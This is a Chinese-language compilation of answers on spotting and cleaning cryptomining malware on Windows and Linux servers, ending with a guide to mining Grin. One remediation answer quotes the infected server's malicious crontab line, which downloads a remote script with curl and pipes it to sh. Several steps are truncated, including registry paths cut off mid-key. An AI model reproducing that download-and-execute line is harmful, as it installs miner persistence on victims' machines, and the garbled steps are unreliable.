windows挖礦日誌分析

『壹』 中挖礦病毒的表現

故障現象：使用過程中，發現經常有服務無故關閉，登錄伺服器經檢查，發現CPU使用率達到100%。在檢測異常進程中，未發現CPU使用率異常的進程（使用 top、htop 以及 ps -aux 進行檢查），於是報障。

檢測過程：

1.找到他shell腳本對應目錄把目錄或者文件刪除。

2.檢查定時任務是否存在挖礦木馬文件在定時任務中，避免定時運行挖礦木馬文件。

3.添加hosts挖礦病毒訪問對應網站，避免二次訪問並下載。

4.排查liunx命令是否損壞，如損壞下載"procps-3.2.8"並編譯，恢復top等系列命令。

5.檢測進程是否異常。

6.排查入侵入口，例如 redis是否存在弱口令，nginx或者apache上面的網站程序是否存在漏洞，並排查下nginx或者apache日誌審查漏洞所在處。

7.排查ssh登錄日誌。

8.把ssh登錄切換成秘鑰登錄。

9.重啟伺服器，檢查是否進程是否正常。

『貳』 windows 10 怎麼清除木馬挖礦病毒

既然是中毒了，就殺毒唄。
首先進行全盤殺毒操作，確認是否有病毒。可以嘗試網路在線殺毒。
如果無法殺毒，建議使用PE系統盤啟動電腦，備份重要的數據後，對硬碟進行快速分區，重建主引導記錄，徹底清除可能的病毒隱患，然後重新安裝系統。
系統安裝完成，記得安裝殺毒軟體，並升級病毒庫，再對備份數據殺毒。

『叄』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『肆』 挖礦病毒怎麼處理

挖礦病毒處理步驟如下：

1、查看伺服器進程運行狀態查看伺服器系統整體運行情況，發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。

2、查看埠及外聯情況查看埠開放狀態及外聯情況，發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址，進一步確定該進程為惡意挖礦進程：定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。

6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。

7、查找敏感文件發現authorized_keys文件。

8、查看ssh日誌文件查看ssh日誌文件，發現大量登陸痕跡以及公鑰上傳痕跡。

『伍』 怎樣知道電腦被挖礦

電腦異常運行緩慢，經常異常死機/卡機，什麼都沒打開但是cpu佔用率非常高，網路緩慢，出現大量網路請求。就需要去檢查一下是否中了挖，畢竟現在很流行的。

首先需要先查看計算機的耗電情況，我一般選擇安裝魯大師。這個比較方便的掌握電腦的硬體情況，看看cpu和系統的溫度很方便的。

然後再檢查啟動後的系統資源使用情況，有沒有異常和較高的內存和cpu的佔用情況。Crtl + Alt + Del 即可進入「Windows任務管理器」，「應用程序」---「進程」---「性能」，都是查看系統資源佔用狀況的。或者：用滑鼠點擊「開始」，在「運行」里輸入：msconfig，也可以進入同樣的窗口。

最後在進程里看有沒有不熟悉的進程，發現了到網上搜索一下，基本就可以確定有沒有了。

檢測電腦是否被挖礦方法
挖礦主要利用的是高級顯卡，這樣效率最高，所以我們只需要監看GPU以及CPU的使用率即可發現。回到主界面，滑鼠右鍵單擊開始按鈕，如下圖所示

2在開始右鍵菜單點擊任務管理器，如下圖所示

3進入任務管理器，先看看運行程序有無cpu使用率極高的，如下圖所示

4在任務管理器點擊性能選項卡，如下圖所示

5進入性能選項卡，點擊下面的GPU，一般有2個，分別是集成顯卡和獨立顯卡，如下圖所示

6正常情況，集成顯卡利用率很低，圖形游戲或大型繪圖軟體才會調用獨立顯卡，如下圖所示

7接著我們看獨立顯卡，默認情況下，獨立顯卡是不使用的，如果你發現游戲，工程軟體沒開，獨立顯卡利用率比較高，那就是被挖礦的，電腦正常，獨立顯卡是休息狀態，

『陸』 挖礦病毒怎麼排查

登錄系統查看任務管理器，查看佔用內存較大且無法關閉的進程。進程上點擊滑鼠右鍵，打開文件位置（先要在文件夾選項中選擇顯示隱藏文件及操作系文件）。此時你可能會看到有一個Systmss.exe進程和模仿操作系統的svchost.exe進程這里還可以看到一個2.bat文件，右鍵編輯打開這個文件查看，可查看到惡意進程與哪個挖礦組織通信。

通過查看系統操作日誌可分析出病毒的來源、啟動時間等信息，一般原因可能是未關閉3389埠且使用了弱密碼導致黑客遠程登錄上次病毒。

根除病毒：將病毒可執行文件Systmss.exe重命名為Systmss.exe1使病毒無法執行，此時可從任務管理器停止進程。打開注冊表編輯器刪除HKEY_LOCAL_整個目錄。

如果是Linux系統請參考：網頁鏈接

『柒』 關於一些比特幣挖礦的事

說實話 瞎耽誤功夫

『捌』 一次挖礦病毒攻擊分析

這兩天期末了，最近老闆這里突然來了個任務，客戶伺服器被攻擊了，某台機器的cpu一直都跑滿了，持續高負荷狀態，客戶公司的運營實在沒有辦法找到了我們。
先說一說之前這台伺服器也出現過問題，被兩波人搞過，一波寫了webshell，另個一種了挖礦病毒，都被清除了，當然這些我都沒有參與。
因為老闆比較忙，我和另一個小夥伴接手進行分析，我們拿到這台伺服器，既然是web伺服器，最好得最有效的辦法就是看web日誌，但是這個日誌是在很多，這就考慮經驗問題了，另一個小夥伴道行比我深，他發現了痕跡：

通過很多嘗試，在篩選「wget」的時候找到了攻擊痕跡。

emmmmm，看到這個POST的請求，基本可以猜測出就是這幾天爆出的thinkphp新的rce，具體讀者可以去看看相關的報告，rce的分析網上也有了，有想去的可以去了解一下。根據這條日誌，篩選ip我們找到了具體的攻擊痕跡：

上傳ibus腳本文件到tmp目錄下命名為指定文件，這里www用戶有對tmp目錄的讀寫許可權。

執行tmp中上傳的指定文件，並等待執行完成，刪除文件.
本地虛擬環境執行了一下這個ibus腳本：

可以看到這里執行生成了三個sh簡單加密的腳本文件：nmi，nbus和.dbus是哪個文件，這三個腳本文件解密之後是三個cat和perl的腳本，分別執行了一下命令：

執行了三個perl腳本，就是挖礦的腳本了。最後我們把生成的惡意文件備份之後就進行清除了，總共是三個sh腳本，三個perl挖礦腳本和兩個記錄id的隨機數之類的文件。
怎麼說呢，這次攻擊分析看似挺簡單的，但是最難的部分，從日誌里找出攻擊者的惡意訪問是很困難的，需要有很多的經驗，比如對最近新漏洞的了解，以及各類典型漏洞的攻擊方式，才能及時的從龐大的日誌文件中根據特徵找到攻擊者的痕跡。
安全從業者還是十分吃經驗的，博主也會更多的在實戰中歷練自己，也會分享記錄自己的經驗。

『玖』 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的，因為沒有解決好漏洞。
建議是重做系統，然後找護衛神給你做一下系統安全加固，把漏洞徹底堵住才有效果。

『拾』 極簡Grin挖礦指南（Win10）

Grin不多重復介紹了，近期很火的一個匿名幣（ https://grin-tech.org/ ），而且還能用CPU、GPU挖礦（N卡。目前似乎還不支持A卡），並且支持多個平台Linux、macOS等等。官網上說不支持Windows，但實際是可以跑的。下面是Windows 10上的部署過程小結。

Windows上用WSL來部署Linux的環境最為方便。在Microsoft Store中搜索Ubuntu即可安裝。

注意！ 裝完之後要修改一下注冊表。不然因為這個內嵌的Ubuntu會帶很多奇怪的Path，導致後面build會出問題，產生不了運行所需的plugin文件夾。

具體步驟是：運行regedit。在注冊表項中，找到 ComputerHKEY_CURRENT_ 將Flag的值改為 5 。

運行Ubuntu，新建用戶名、並輸入自己想要設置的密碼

Grin是用rust編寫的，安裝好相關環境

再安裝好其他依賴

Grin節點也和其他區塊鏈類似，可以自己部署也可以利用礦池。兩種方式選一即可。

如果要自己運行一個Grin節點，按照以下步驟：

target/release/grin 即為可運行文件

目前也有一些Grin的礦池可以鏈接，不想自己運行Grin的話，可以注冊一個。比較有名的是GRIN-Pool（ https://mwgrinpool.com/ ）
點右上角Login後按提示注冊即可。自己需要記住用戶名和密碼。

另開一個Ubuntu的終端，輸入：

檢查你CPU是否支持avx2

如果大於0，那麼輸入以下：

如果是多核，可以指定挖礦的核數（build後每次運行前也可以修改）

查看有多少個可用的CPU，並輸入想使用的CPU數量

如果是N卡，可以用GPU挖礦

然後輸入 nvidia-smi 運行後得到的Device ID

如果用的是礦池，還要額外配置一下礦池信息：

輸入在礦池裡注冊的用戶名和密碼

先build

然後運行

如果一切順利，現在已經可以挖礦了；如果不順利，那麼我也不知道了。

https://github.com/mimblewimble/grin
https://github.com/mimblewimble/grin-miner
https://medium.com/@blade.doyle/cpu-mining-on-mwgrinpool-com-how-to-efb9ed102bc9
https://medium.com/@blade.doyle/gpu-mining-on-mwgrinpool-com-how-to-72970e550a27